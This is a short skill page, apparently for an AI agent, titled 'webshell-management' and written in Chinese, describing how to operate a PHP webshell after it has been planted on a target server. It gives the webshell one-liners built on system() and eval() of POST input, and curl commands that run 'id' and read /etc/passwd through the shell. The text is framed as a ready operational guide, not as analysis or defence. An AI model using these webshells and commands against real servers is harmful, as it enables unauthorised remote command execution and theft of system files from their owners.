webshell-management

Installation
SKILL.md

Webshell 部署后 CLI 操作

前置条件:webshell 已部署到目标。本 skill 聚焦部署后的 CLI 交互与管理操作。

Phase 1: curl 交互操作

1.1 命令执行

# system() 型: <?php system($_POST['c']);?>
curl -s -d "c=id" http://TARGET/shell.php
curl -s --data-urlencode "c=cat /etc/passwd" http://TARGET/shell.php

# eval() 型: <?php eval($_POST['c']);?>
curl -s -d "c=system('id');" http://TARGET/shell.php
curl -s -d "c=echo file_get_contents('/etc/passwd');" http://TARGET/shell.php
Installs
17
GitHub Stars
1.7K
First Seen
Apr 22, 2026
webshell-management — wgpsec/aboutsecurity